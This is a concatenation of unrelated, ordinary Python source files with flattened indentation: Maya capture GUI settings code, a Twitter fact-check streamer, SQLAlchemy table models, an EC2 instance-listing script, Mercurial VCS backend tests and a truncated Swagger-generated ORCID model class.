widget_outputs = widget.get_outputs()
if not widget_outputs:
continue
for key, value in widget_outputs.items():
# We merge dictionaries by updating them so we have
# the "mixed" values of both settings
if isinstance(value, dict) and key in outputs:
outputs[key].update(value)
else:
outputs[key] = value
return outputs
def get_inputs(self, as_preset=False):
"""Return the inputs per plug-in widgets by `plugin.id`.
Returns:
dict: The inputs per widget
"""
inputs = dict()
# Here we collect all the widgets from which we want to store the
# current inputs. This will be restored in the next session
# The preset widget is added to make sure the user starts with the
# previously selected preset configuration
config_widgets = self._get_plugin_widgets()
config_widgets.append(self.presetwidget)
for widget in config_widgets:
widget_inputs = widget.get_inputs(as_preset=as_preset)
if not isinstance(widget_inputs, dict):
log.debug("Widget inputs are not a dictionary "
"'{}': {}".format(widget.id, widget_inputs))
                # Skip malformed widget inputs rather than aborting the
                # whole collection.
                continue
if not widget_inputs:
continue
inputs[widget.id] = widget_inputs
return inputs
def on_widget_settings_changed(self):
"""Set current preset to '*' on settings change"""
        self.options_changed.emit(self.get_outputs())
self.presetwidget.presets.setCurrentIndex(0)
def _build_configuration_dialog(self):
"""Build a configuration to store configuration widgets in"""
dialog = QtWidgets.QDialog(self)
dialog.setWindowTitle("Capture - Preset Configuration")
QtWidgets.QVBoxLayout(dialog)
self._config_dialog = dialog
def _ensure_config_exist(self):
"""Create the configuration file if it does not exist yet.
Returns:
unicode: filepath of the configuration file
"""
userdir = os.path.expanduser("~")
capturegui_dir = os.path.join(userdir, "CaptureGUI")
capturegui_inputs = os.path.join(capturegui_dir, "capturegui.json")
if not os.path.exists(capturegui_dir):
os.makedirs(capturegui_dir)
if not os.path.isfile(capturegui_inputs):
config = open(capturegui_inputs, "w")
config.close()
return capturegui_inputs
def _store_widget_configuration(self):
"""Store all used widget settings in the local json file"""
inputs = self.get_inputs(as_preset=False)
path = self.settingfile
with open(path, "w") as f:
log.debug("Writing JSON file: {0}".format(path))
json.dump(inputs, f, sort_keys=True,
indent=4, separators=(',', ': '))
def _read_widget_configuration(self):
"""Read the stored widget inputs"""
inputs = {}
path = self.settingfile
if not os.path.isfile(path) or os.stat(path).st_size == 0:
return inputs
with open(path, "r") as f:
log.debug("Reading JSON file: {0}".format(path))
try:
inputs = json.load(f)
except ValueError as error:
log.error(str(error))
return inputs
def _get_plugin_widgets(self):
"""List all plug-in widgets.
Returns:
list: The plug-in widgets in *all* sections
"""
widgets = list()
for section in self.plugins.values():
widgets.extend(section)
return widgets
# override close event to ensure the input are stored
def closeEvent(self, event):
"""Store current configuration upon closing the application."""
self._store_widget_configuration()
for section_widgets in self.plugins.values():
for widget in section_widgets:
widget.uninitialize()
event.accept()
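
# Hedged usage sketch (the import path and window title are assumptions,
# not defined in this module): inside Maya one might launch the tool
# roughly like this.
#
#   from capture_gui import gui
#   window = gui.App("Capture GUI", parent=None)
#   window.show()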
|
import logging
import requests
from twython import TwythonStreamer
import settings
class FactStreamer(TwythonStreamer):
def __init__(self, users, *args, **kwargs):
self.users = users
super().__init__(*args, **kwargs)
@property
def logger(self):
return logging.getLogger(str(self))
def on_success(self, data):
if 'text' in data:
tweet = data['text']
self.logger.info(tweet)
response = requests.get(
settings.FACTCHECK_API_URL,
params=dict(q=tweet, api_key=settings.FACTCHECK_API_KEY),
)
try:
conclusion = response.json()['matches'][0]['conclusion']
self.logger.info(conclusion)
            except (ValueError, LookupError):
self.logger.warning('Could not get conclusion')
def on_error(self, status_code, data):
self.logger.warning(data)
def __str__(self):
return '<streamer.FactStreamer(tracking {} ID{})>'.format(
len(self.users),
's' if len(self.users) > 1 else '',
)
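
# Hedged usage sketch (the four credential setting names are
# assumptions; only FACTCHECK_API_URL and FACTCHECK_API_KEY appear in
# this module):
#
#   user_ids = ['123456789']
#   streamer = FactStreamer(
#       user_ids,
#       settings.APP_KEY, settings.APP_SECRET,
#       settings.OAUTH_TOKEN, settings.OAUTH_TOKEN_SECRET,
#   )
#   streamer.statuses.filter(follow=','.join(user_ids))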
|
from sqlalchemy import BINARY, Column, Index, Integer, String, Unicode
from dbdatetime import dbdatetime
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
metadata = Base.metadata
class DoorkeeperExternalObject(Base):
__tablename__ = 'doorkeeper_externalobject'
__table_args__ = (
Index('key_full', 'applicationType', 'applicationDomain', 'objectType', 'objectID'),
)
id = Column(Integer, primary_key=True)
phid = Column(String, nullable=False, unique=True)
objectKey = Column(BINARY(12), nullable=False, unique=True)
applicationType = Column(Unicode(32), nullable=False)
applicationDomain = Column(Unicode(32), nullable=False)
objectType = Column(Unicode(32), nullable=False)
objectID = Column(Unicode(64), nullable=False)
objectURI = Column(Unicode(128))
importerPHID = Column(String)
properties = Column(Unicode, nullable=False)
viewPolicy = Column(String, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
dateModified = Column(dbdatetime, nullable=False)
class Edge(Base):
__tablename__ = 'edge'
__table_args__ = (
Index('key_dst', 'dst', 'type', 'src', unique=True),
Index('src', 'src', 'type', 'dateCreated', 'seq')
)
src = Column(String, primary_key=True, nullable=False)
type = Column(Integer, primary_key=True, nullable=False)
dst = Column(String, primary_key=True, nullable=False)
dateCreated = Column(dbdatetime, nullable=False)
seq = Column(Integer, nullable=False)
dataID = Column(Integer)
class EdgeData(Base):
__tablename__ = 'edgedata'
id = Column(Integer, primary_key=True)
data = Column(Unicode, nullable=False)
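# Usage sketch (illustrative, not part of the module): create the schema in
# an in-memory SQLite database and insert one Edge row. This assumes the
# custom dbdatetime type accepts plain datetime values.
if __name__ == '__main__':
    import datetime
    from sqlalchemy import create_engine
    from sqlalchemy.orm import sessionmaker
    engine = create_engine('sqlite://')
    Base.metadata.create_all(engine)
    session = sessionmaker(bind=engine)()
    session.add(Edge(src='PHID-SRC', type=1, dst='PHID-DST',
                     dateCreated=datetime.datetime.utcnow(), seq=0))
    session.commit()
    print(session.query(Edge).count())  # -> 1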
|
import sys
from boto.ec2.connection import EC2Connection
def instancedetails(ec2, instance_ids):
    """Print id, state and private IP for each requested instance."""
reservations = ec2.get_all_instances(instance_ids=instance_ids)
for reservation in reservations:
instances = reservation.instances
for instance in instances:
print "Instance {0}".format(instance.id)
print "State: {0}".format(instance.state)
print "Private IP: {0}".format(instance.private_ip_address)
print
if len(sys.argv) < 2:
print "Usage: {0} instance-id [instance-id ...]".format(sys.argv[0])
sys.exit(1)
ec2 = EC2Connection()
instancedetails(ec2, sys.argv[1:])
|
from __future__ import with_statement
import os
from vcs.backends.hg import MercurialRepository, MercurialChangeset
from vcs.exceptions import RepositoryError, VCSError, NodeDoesNotExistError
from vcs.nodes import NodeKind, NodeState
from vcs.tests.conf import TEST_HG_REPO, TEST_HG_REPO_CLONE, TEST_HG_REPO_PULL
from vcs.utils.compat import unittest
import mercurial.scmutil
# Prime mercurial's cached rc path, then truncate it so user/system hgrc
# files cannot influence the test environment.
mercurial.scmutil.rcpath()
if mercurial.scmutil._rcpath:
    mercurial.scmutil._rcpath = mercurial.scmutil._rcpath[:1]
class MercurialRepositoryTest(unittest.TestCase):
def __check_for_existing_repo(self):
if os.path.exists(TEST_HG_REPO_CLONE):
self.fail('Cannot test mercurial clone repo as location %s already '
'exists. You should manually remove it first.'
% TEST_HG_REPO_CLONE)
def setUp(self):
self.repo = MercurialRepository(TEST_HG_REPO)
def test_wrong_repo_path(self):
wrong_repo_path = '/tmp/errorrepo'
self.assertRaises(RepositoryError, MercurialRepository, wrong_repo_path)
def test_unicode_path_repo(self):
        self.assertRaises(VCSError, lambda: MercurialRepository(u'iShouldFail'))
def test_repo_clone(self):
self.__check_for_existing_repo()
repo = MercurialRepository(TEST_HG_REPO)
repo_clone = MercurialRepository(TEST_HG_REPO_CLONE,
src_url=TEST_HG_REPO, update_after_clone=True)
self.assertEqual(len(repo.revisions), len(repo_clone.revisions))
# Checking hashes of changesets should be enough
for changeset in repo.get_changesets():
raw_id = changeset.raw_id
self.assertEqual(raw_id, repo_clone.get_changeset(raw_id).raw_id)
def test_repo_clone_with_update(self):
repo = MercurialRepository(TEST_HG_REPO)
repo_clone = MercurialRepository(TEST_HG_REPO_CLONE + '_w_update',
src_url=TEST_HG_REPO, update_after_clone=True)
self.assertEqual(len(repo.revisions), len(repo_clone.revisions))
        # check if the working directory was updated
        self.assertTrue(os.path.isfile(os.path.join(
            TEST_HG_REPO_CLONE + '_w_update', 'MANIFEST.in')))
def test_repo_clone_without_update(self):
repo = MercurialRepository(TEST_HG_REPO)
repo_clone = MercurialRepository(TEST_HG_REPO_CLONE + '_wo_update',
src_url=TEST_HG_REPO, update_after_clone=False)
self.assertEqual(len(repo.revisions), len(repo_clone.revisions))
        self.assertFalse(os.path.isfile(os.path.join(
            TEST_HG_REPO_CLONE + '_wo_update', 'MANIFEST.in')))
def test_pull(self):
if os.path.exists(TEST_HG_REPO_PULL):
self.fail('Cannot test mercurial pull command as location %s '
'already exists. You should manually remove it first'
% TEST_HG_REPO_PULL)
repo_new = MercurialRepository(TEST_HG_REPO_PULL, create=True)
self.assertTrue(len(self.repo.revisions) > len(repo_new.revisions))
repo_new.pull(self.repo.path)
repo_new = MercurialRepository(TEST_HG_REPO_PULL)
self.assertTrue(len(self.repo.revisions) == len(repo_new.revisions))
def test_revisions(self):
        # these revisions are already published at bitbucket,
        # so we can assume they will stay available from now on
subset = set(['b986218ba1c9b0d6a259fac9b050b1724ed8e545',
'3d8f361e72ab303da48d799ff1ac40d5ac37c67e',
'6cba7170863a2411822803fa77a0a264f1310b35',
'56349e29c2af3ac913b28bde9a2c6154436e615b',
'2dda4e345facb0ccff1a191052dd1606dba6781d',
'6fff84722075f1607a30f436523403845f84cd9e',
'7d4bc8ec6be56c0f10425afb40b6fc315a4c25e7',
'3803844fdbd3b711175fc3da9bdacfcd6d29a6fb',
'dc5d2c0661b61928834a785d3e64a3f80d3aad9c',
'be90031137367893f1c406e0a8683010fd115b79',
'db8e58be770518cbb2b1cdfa69146e47cd481481',
'84478366594b424af694a6c784cb991a16b87c21',
'17f8e105dddb9f339600389c6dc7175d395a535c',
'20a662e756499bde3095ffc9bc0643d1def2d0eb',
'2e319b85e70a707bba0beff866d9f9de032aa4f9',
'786facd2c61deb9cf91e9534735124fb8fc11842',
'94593d2128d38210a2fcd1aabff6dda0d6d9edf8',
'aa6a0de05b7612707db567078e130a6cd114a9a7',
'eada5a770da98ab0dd7325e29d00e0714f228d09'
])
self.assertTrue(subset.issubset(set(self.repo.revisions)))
# check if we have the proper order of revisions
org = ['b986218ba1c9b0d6a259fac9b050b1724ed8e545',
'3d8f361e72ab303da48d799ff1ac40d5ac37c67e',
'6cba7170863a2411822803fa77a0a264f1310b35',
'56349e29c2af3ac913b28bde9a2c6154436e615b',
'2dda4e345facb0ccff1a191052dd1606dba6781d',
'6fff84722075f1607a30f436523403845f84cd9e',
'7d4bc8ec6be56c0f10425afb40b6fc315a4c25e7',
'3803844fdbd3b711175fc3da9bdacfcd6d29a6fb',
'dc5d2c0661b61928834a785d3e64a3f80d3aad9c',
'be90031137367893f1c406e0a8683010fd115b79',
'db8e58be770518cbb2b1cdfa69146e47cd481481',
'84478366594b424af694a6c784cb991a16b87c21',
'17f8e105dddb9f339600389c6dc7175d395a535c',
'20a662e756499bde3095ffc9bc0643d1def2d0eb',
'2e319b85e70a707bba0beff866d9f9de032aa4f9',
'786facd2c61deb9cf91e9534735124fb8fc11842',
'94593d2128d38210a2fcd1aabff6dda0d6d9edf8',
'aa6a0de05b7612707db567078e130a6cd114a9a7',
'eada5a770da98ab0dd7325e29d00e0714f228d09',
'2c1885c735575ca478bf9e17b0029dca68824458',
'd9bcd465040bf869799b09ad732c04e0eea99fe9',
'469e9c847fe1f6f7a697b8b25b4bc5b48780c1a7',
'4fb8326d78e5120da2c7468dcf7098997be385da',
'62b4a097164940bd66030c4db51687f3ec035eed',
'536c1a19428381cfea92ac44985304f6a8049569',
'965e8ab3c44b070cdaa5bf727ddef0ada980ecc4',
'9bb326a04ae5d98d437dece54be04f830cf1edd9',
'f8940bcb890a98c4702319fbe36db75ea309b475',
'ff5ab059786ebc7411e559a2cc309dfae3625a3b',
'6b6ad5f82ad5bb6190037671bd254bd4e1f4bf08',
'ee87846a61c12153b51543bf860e1026c6d3dcba', ]
self.assertEqual(org, self.repo.revisions[:31])
def test_iter_slice(self):
sliced = list(self.repo[:10])
itered = list(self.repo)[:10]
self.assertEqual(sliced, itered)
def test_slicing(self):
        # expected slice sizes: 4, 1, 5, 10, 95
for sfrom, sto, size in [(0, 4, 4), (1, 2, 1), (10, 15, 5),
(10, 20, 10), (5, 100, 95)]:
revs = list(self.repo[sfrom:sto])
self.assertEqual(len(revs), size)
self.assertEqual(revs[0], self.repo.get_changeset(sfrom))
self.assertEqual(revs[-1], self.repo.get_changeset(sto - 1))
def test_branches(self):
# TODO: Need more tests here
#active branches
self.assertTrue('default' in self.repo.branches)
self.assertTrue('stable' in self.repo.branches)
# closed
self.assertTrue('git' in self.repo._get_branches(closed=True))
self.assertTrue('web' in self.repo._get_branches(closed=True))
for name, id in self.repo.branches.items():
self.assertTrue(isinstance(
self.repo.get_changeset(id), MercurialChangeset))
def test_tip_in_tags(self):
# tip is always a tag
self.assertIn('tip', self.repo.tags)
def test_tip_changeset_in_tags(self):
tip = self.repo.get_changeset()
self.assertEqual(self.repo.tags['tip'], tip.raw_id)
def test_initial_changeset(self):
init_chset = self.repo.get_changeset(0)
self.assertEqual(init_chset.message, 'initial import')
self.assertEqual(init_chset.author,
'Marcin Kuzminski <marcin@python-blog.com>')
self.assertEqual(sorted(init_chset._file_paths),
sorted([
'vcs/__init__.py',
'vcs/backends/BaseRepository.py',
'vcs/backends/__init__.py',
])
)
self.assertEqual(sorted(init_chset._dir_paths),
sorted(['', 'vcs', 'vcs/backends']))
self.assertRaises(NodeDoesNotExistError, init_chset.get_node, path='foobar')
node = init_chset.get_node('vcs/')
self.assertTrue(hasattr(node, 'kind'))
self.assertEqual(node.kind, NodeKind.DIR)
node = init_chset.get_node('vcs')
self.assertTrue(hasattr(node, 'kind'))
self.assertEqual(node.kind, NodeKind.DIR)
node = init_chset.get_node('vcs/__init__.py')
self.assertTrue(hasattr(node, 'kind'))
self.assertEqual(node.kind, NodeKind.FILE)
def test_not_existing_changeset(self):
#rawid
self.assertRaises(RepositoryError, self.repo.get_changeset,
'abcd' * 10)
#shortid
self.assertRaises(RepositoryError, self.repo.get_changeset,
'erro' * 4)
#numeric
self.assertRaises(RepositoryError, self.repo.get_changeset,
self.repo.count() + 1)
# Small chance we ever get to this one
revision = pow(2, 30)
self.assertRaises(RepositoryError, self.repo.get_changeset, revision)
def test_changeset10(self):
chset10 = self.repo.get_changeset(10)
README = """===
VCS
===
Various Version Control System management abstraction layer for Python.
Introduction
------------
TODO: To be written...
"""
node = chset10.get_node('README.rst')
self.assertEqual(node.kind, NodeKind.FILE)
self.assertEqual(node.content, README)
class MercurialChangesetTest(unittest.TestCase):
def setUp(self):
self.repo = MercurialRepository(TEST_HG_REPO)
def _test_equality(self, changeset):
revision = changeset.revision
self.assertEqual(changeset, self.repo.get_changeset(revision))
def test_equality(self):
revs = [0, 10, 20]
changesets = [self.repo.get_changeset(rev) for rev in revs]
for changeset in changesets:
self._test_equality(changeset)
def test_default_changeset(self):
tip = self.repo.get_changeset('tip')
self.assertEqual(tip, self.repo.get_changeset())
self.assertEqual(tip, self.repo.get_changeset(revision=None))
self.assertEqual(tip, list(self.repo[-1:])[0])
def test_root_node(self):
tip = self.repo.get_changeset('tip')
self.assertTrue(tip.root is tip.get_node(''))
def test_lazy_fetch(self):
"""
Test if changeset's nodes expands and are cached as we walk through
the revision. This test is somewhat hard to write as order of tests
is a key here. Written by running command after command in a shell.
"""
chset = self.repo.get_changeset(45)
self.assertTrue(len(chset.nodes) == 0)
root = chset.root
self.assertTrue(len(chset.nodes) == 1)
self.assertTrue(len(root.nodes) == 8)
# accessing root.nodes updates chset.nodes
self.assertTrue(len(chset.nodes) == 9)
docs = root.get_node('docs')
# we haven't yet accessed anything new as docs dir was already cached
self.assertTrue(len(chset.nodes) == 9)
self.assertTrue(len(docs.nodes) == 8)
# accessing docs.nodes updates chset.nodes
self.assertTrue(len(chset.nodes) == 17)
self.assertTrue(docs is chset.get_node('docs'))
self.assertTrue(docs is root.nodes[0])
self.assertTrue(docs is root.dirs[0])
self.assertTrue(docs is chset.get_node('docs'))
def test_nodes_with_changeset(self):
chset = self.repo.get_changeset(45)
root = chset.root
docs = root.get_node('docs')
self.assertTrue(docs is chset.get_node('docs'))
api = docs.get_node('api')
self.assertTrue(api is chset.get_node('docs/api'))
index = api.get_node('index.rst')
self.assertTrue(index is chset.get_node('docs/api/index.rst'))
self.assertTrue(index is chset.get_node('docs')\
.get_node('api')\
.get_node('index.rst'))
def test_branch_and_tags(self):
chset0 = self.repo.get_changeset(0)
self.assertEqual(chset0.branch, 'default')
self.assertEqual(chset0.tags, [])
chset10 = self.repo.get_changeset(10)
self.assertEqual(chset10.branch, 'default')
self.assertEqual(chset10.tags, [])
chset44 = self.repo.get_changeset(44)
self.assertEqual(chset44.branch, 'web')
tip = self.repo.get_changeset('tip')
self.assertTrue('tip' in tip.tags)
def _test_file_size(self, revision, path, size):
node = self.repo.get_changeset(revision).get_node(path)
self.assertTrue(node.is_file())
self.assertEqual(node.size, size)
def test_file_size(self):
to_check = (
(10, 'setup.py', 1068),
(20, 'setup.py', 1106),
(60, 'setup.py', 1074),
(10, 'vcs/backends/base.py', 2921),
(20, 'vcs/backends/base.py', 3936),
(60, 'vcs/backends/base.py', 6189),
)
for revision, path, size in to_check:
self._test_file_size(revision, path, size)
def test_file_history(self):
# we can only check if those revisions are present in the history
# as we cannot update this test every time file is changed
files = {
'setup.py': [7, 18, 45, 46, 47, 69, 77],
'vcs/nodes.py': [7, 8, 24, 26, 30, 45, 47, 49, 56, 57, 58, 59, 60,
61, 73, 76],
'vcs/backends/hg.py': [4, 5, 6, 11, 12, 13, 14, 15, 16, 21, 22, 23,
26, 27, 28, 30, 31, 33, 35, 36, 37, 38, 39, 40, 41, 44, 45, 47,
48, 49, 53, 54, 55, 58, 60, 61, 67, 68, 69, 70, 73, 77, 78, 79,
82],
}
for path, revs in files.items():
tip = self.repo.get_changeset(revs[-1])
node = tip.get_node(path)
node_revs = [chset.revision for chset in node.history]
self.assertTrue(set(revs).issubset(set(node_revs)),
"We assumed that %s is subset of revisions for which file %s "
"has been changed, and history of that node returned: %s"
% (revs, path, node_revs))
def test_file_annotate(self):
files = {
'vcs/backends/__init__.py':
{89: {'lines_no': 31,
'changesets': [32, 32, 61, 32, 32, 37, 32, 32, 32, 44,
37, 37, 37, 37, 45, 37, 44, 37, 37, 37,
32, 32, 32, 32, 37, 32, 37, 37, 32,
32, 32]},
20: {'lines_no': 1,
'changesets': [4]},
55: {'lines_no': 31,
'changesets': [32, 32, 45, 32, 32, 37, 32, 32, 32, 44,
37, 37, 37, 37, 45, 37, 44, 37, 37, 37,
32, 32, 32, 32, 37, 32, 37, 37, 32,
32, 32]}},
'vcs/exceptions.py':
{89: {'lines_no': 18,
'changesets': [16, 16, 16, 16, 16, 16, 16, 16, 16, 16,
16, 16, 17, 16, 16, 18, 18, 18]},
20: {'lines_no': 18,
'changesets': [16, 16, 16, 16, 16, 16, 16, 16, 16, 16,
16, 16, 17, 16, 16, 18, 18, 18]},
55: {'lines_no': 18, 'changesets': [16, 16, 16, 16, 16, 16,
16, 16, 16, 16, 16, 16,
17, 16, 16, 18, 18, 18]}},
'MANIFEST.in': {89: {'lines_no': 5,
'changesets': [7, 7, 7, 71, 71]},
20: {'lines_no': 3,
'changesets': [7, 7, 7]},
55: {'lines_no': 3,
'changesets': [7, 7, 7]}}}
for fname, revision_dict in files.items():
for rev, data in revision_dict.items():
cs = self.repo.get_changeset(rev)
l1_1 = [x[1] for x in cs.get_file_annotate(fname)]
l1_2 = [x[2]().raw_id for x in cs.get_file_annotate(fname)]
self.assertEqual(l1_1, l1_2)
                l1 = [x[2]().revision for x in cs.get_file_annotate(fname)]
                l2 = files[fname][rev]['changesets']
                self.assertEqual(l1, l2,
                    "The lists of revisions for %s@rev%s from the annotation "
                    "list should match, got \n%s \nvs \n%s" % (fname, rev, l1, l2))
def test_changeset_state(self):
"""
Tests which files have been added/changed/removed at particular revision
"""
# rev 46ad32a4f974:
# hg st --rev 46ad32a4f974
# changed: 13
# added: 20
# removed: 1
changed = set(['.hgignore'
, 'README.rst' , 'docs/conf.py' , 'docs/index.rst' , 'setup.py'
, 'tests/test_hg.py' , 'tests/test_nodes.py' , 'vcs/__init__.py'
, 'vcs/backends/__init__.py' , 'vcs/backends/base.py'
, 'vcs/backends/hg.py' , 'vcs/nodes.py' , 'vcs/utils/__init__.py'])
added = set(['docs/api/backends/hg.rst'
, 'docs/api/backends/index.rst' , 'docs/api/index.rst'
, 'docs/api/nodes.rst' , 'docs/api/web/index.rst'
, 'docs/api/web/simplevcs.rst' , 'docs/installation.rst'
, 'docs/quickstart.rst' , 'setup.cfg' , 'vcs/utils/baseui_config.py'
, 'vcs/utils/web.py' , 'vcs/web/__init__.py' , 'vcs/web/exceptions.py'
, 'vcs/web/simplevcs/__init__.py' , 'vcs/web/simplevcs/exceptions.py'
, 'vcs/web/simplevcs/middleware.py' , 'vcs/web/simplevcs/models.py'
, 'vcs/web/simplevcs/settings.py' , 'vcs/web/simplevcs/utils.py'
, 'vcs/web/simplevcs/views.py'])
removed = set(['docs/api.rst'])
chset64 = self.repo.get_changeset('46ad32a4f974')
self.assertEqual(set((node.path for node in chset64.added)), added)
self.assertEqual(set((node.path for node in chset64.changed)), changed)
self.assertEqual(set((node.path for node in chset64.removed)), removed)
        # rev b090f22d27d6:
        # hg st --rev b090f22d27d6
        # changed: 1
        # added: 0
        # removed: 0
chset88 = self.repo.get_changeset('b090f22d27d6')
self.assertEqual(set((node.path for node in chset88.added)), set())
self.assertEqual(set((node.path for node in chset88.changed)),
set(['.hgignore']))
self.assertEqual(set((node.path for node in chset88.removed)), set())
# 85:
# added: 2 ['vcs/utils/diffs.py', 'vcs/web/simplevcs/views/diffs.py']
# changed: 4 ['vcs/web/simplevcs/models.py', ...]
# removed: 1 ['vcs/utils/web.py']
chset85 = self.repo.get_changeset(85)
self.assertEqual(set((node.path for node in chset85.added)), set([
'vcs/utils/diffs.py',
'vcs/web/simplevcs/views/diffs.py']))
self.assertEqual(set((node.path for node in chset85.changed)), set([
'vcs/web/simplevcs/models.py',
'vcs/web/simplevcs/utils.py',
'vcs/web/simplevcs/views/__init__.py',
'vcs/web/simplevcs/views/repository.py',
]))
self.assertEqual(set((node.path for node in chset85.removed)),
set(['vcs/utils/web.py']))
def test_files_state(self):
"""
Tests state of FileNodes.
"""
chset = self.repo.get_changeset(85)
node = chset.get_node('vcs/utils/diffs.py')
        self.assertEqual(node.state, NodeState.ADDED)
self.assertTrue(node.added)
self.assertFalse(node.changed)
self.assertFalse(node.not_changed)
self.assertFalse(node.removed)
chset = self.repo.get_changeset(88)
node = chset.get_node('.hgignore')
        self.assertEqual(node.state, NodeState.CHANGED)
self.assertFalse(node.added)
self.assertTrue(node.changed)
self.assertFalse(node.not_changed)
self.assertFalse(node.removed)
chset = self.repo.get_changeset(85)
node = chset.get_node('setup.py')
        self.assertEqual(node.state, NodeState.NOT_CHANGED)
self.assertFalse(node.added)
self.assertFalse(node.changed)
self.assertTrue(node.not_changed)
self.assertFalse(node.removed)
# If node has REMOVED state then trying to fetch it would raise
# ChangesetError exception
chset = self.repo.get_changeset(2)
path = 'vcs/backends/BaseRepository.py'
self.assertRaises(NodeDoesNotExistError, chset.get_node, path)
# but it would be one of ``removed`` (changeset's attribute)
self.assertTrue(path in [rf.path for rf in chset.removed])
def test_commit_message_is_unicode(self):
for cm in self.repo:
self.assertEqual(type(cm.message), unicode)
def test_changeset_author_is_unicode(self):
for cm in self.repo:
self.assertEqual(type(cm.author), unicode)
def test_repo_files_content_is_unicode(self):
test_changeset = self.repo.get_changeset(100)
for node in test_changeset.get_node('/'):
if node.is_file():
self.assertEqual(type(node.content), unicode)
def test_wrong_path(self):
# There is 'setup.py' in the root dir but not there:
path = 'foo/bar/setup.py'
self.assertRaises(VCSError, self.repo.get_changeset().get_node, path)
def test_archival_file(self):
#TODO:
pass
def test_archival_as_generator(self):
#TODO:
pass
def test_archival_wrong_kind(self):
tip = self.repo.get_changeset()
self.assertRaises(VCSError, tip.fill_archive, kind='error')
def test_archival_empty_prefix(self):
#TODO:
pass
def test_author_email(self):
self.assertEqual('marcin@python-blog.com',
self.repo.get_changeset('b986218ba1c9').author_email)
self.assertEqual('lukasz.balcerzak@python-center.pl',
self.repo.get_changeset('3803844fdbd3').author_email)
self.assertEqual('',
self.repo.get_changeset('84478366594b').author_email)
def test_author_username(self):
self.assertEqual('Marcin Kuzminski',
self.repo.get_changeset('b986218ba1c9').author_name)
self.assertEqual('Lukasz Balcerzak',
self.repo.get_changeset('3803844fdbd3').author_name)
self.assertEqual('marcink',
self.repo.get_changeset('84478366594b').author_name)
|
"""
ORCID Member
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: Latest
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
from orcid_api_v3.models.external_i_ds_v30_rc2 import ExternalIDsV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.fuzzy_date_v30_rc2 import FuzzyDateV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.research_resource_hosts_v30_rc2 import ResearchResourceHostsV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.research_resource_title_v30_rc2 import ResearchResourceTitleV30Rc2 # noqa: F401,E501
from orcid_api_v3.models.url_v30_rc2 import UrlV30Rc2 # noqa: F401,E501
class ResearchResourceProposalV30Rc2(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'title': 'ResearchResourceTitleV30Rc2',
'hosts': 'ResearchResourceHostsV30Rc2',
'external_ids': 'ExternalIDsV30Rc2',
'start_date': 'FuzzyDateV30Rc2',
'end_date': 'FuzzyDateV30Rc2',
'url': 'UrlV30Rc2'
}
attribute_map = {
'title': 'title',
'hosts': 'hosts',
'external_ids': 'external-ids',
'start_date': 'start-date',
'end_date': 'end-date',
'url': 'url'
}
def __init__(self, title=None, hosts=None, external_ids=None, start_date=None, end_date=None, url=None): # noqa: E501
"""ResearchResourceProposalV30Rc2 - a model defined in Swagger""" # noqa: E501
self._title = None
self._hosts = None
self._external_ids = None
self._start_date = None
self._end_date = None
self._url = None
self.discriminator = None
if title is not None:
self.title = title
if hosts is not None:
self.hosts = hosts
if external_ids is not None:
self.external_ids = external_ids
if start_date is not None:
self.start_date = start_date
if end_date is not None:
self.end_date = end_date
if url is not None:
self.url = url
@property
def title(self):
"""Gets the title of this ResearchResourceProposalV30Rc2. # noqa: E501
:return: The title of this ResearchResourceProposalV30Rc2. # noqa: E501
:rtype: ResearchResourceTitleV30Rc2
"""
return self._title
@title.setter
def title(self, title):
"""Sets the title of this ResearchResourceProposalV30Rc2.
:param title: The title of this ResearchResourceProposalV30Rc2. # noqa: E501
:type: ResearchResourceTitleV30Rc2
"""
self._title = title
@property
def hosts(self):
"""Gets the hosts of this ResearchResourceProposalV30Rc2. # noqa: E501
:return: The hosts of this ResearchResourceProposalV30Rc2. # noqa: E501
:rtype: ResearchResourceHostsV30Rc2
"""
return self._hosts
@hosts.setter
def hosts(self, hosts):
"""Sets the hosts of this ResearchResourceProposalV30Rc2.
:param hosts: The hosts of this ResearchResourceProposalV30Rc2. # noqa: E501
:type: ResearchResourceHostsV30Rc2
"""
self._hosts = hosts
@property
def external_ids(self):
"""Gets the external_ids of this ResearchResourceProposalV30Rc2. # noqa: E501
:return: The external_ids of this ResearchResourceProposalV30Rc2. # noqa: E501
:rtype: ExternalIDsV30Rc2
"""
return self._external_ids
@external_ids.setter
def external_ids(self, external_ids):
"""Sets the external_ids of this ResearchResourceProposalV30Rc2.
:param external_ids: The external_ids of this ResearchResourceProposalV30Rc2. # noqa: E501
:type: ExternalIDsV30Rc2
"""
self._external_ids = external_ids
@property
def start_date(self):
"""Gets the start_date of this ResearchResourceProposalV30Rc2. # noqa: E501
:return: The start_date of this ResearchResourceProposalV30Rc2. # noqa: E501
:rtype: FuzzyDateV30Rc2
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""Sets the start_date of this ResearchResourceProposalV30Rc2.
:param start_date: The start_date of this ResearchResourceProposalV30Rc2. # noqa: E501
:type: FuzzyDateV30Rc2
"""
self._start_date = start_date
@property
def end_date(self):
"""Gets the end_date of this ResearchResourceProposalV30Rc2. # noqa: E501
:return: The end_date of this ResearchResourceProposalV30Rc2. # noqa: E501
:rtype: FuzzyDateV30Rc2
"""
return self._end_date
@end_date.setter
def end_date(self, end_date):
"""Sets the end_date of this ResearchResourceProposalV30Rc2.
:param end_date: The end_date of this ResearchResourceProposalV30Rc2. # noqa: E501
:type: FuzzyDateV30Rc2
"""
self._end_date = end_date
@property
def url(self):
"""Gets the url of this ResearchResourceProposalV30Rc2. # noqa: E501
:return: The url of this ResearchResourceProposalV30Rc2. # noqa: E501
:rtype: UrlV30Rc2
"""
return self._url
@url.setter
def url(self, url):
"""Sets the url of this ResearchResourceProposalV30Rc2.
:param url: The url of this ResearchResourceProposalV30Rc2. # noqa: E501
:type: UrlV30Rc2
"""
self._url = url
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
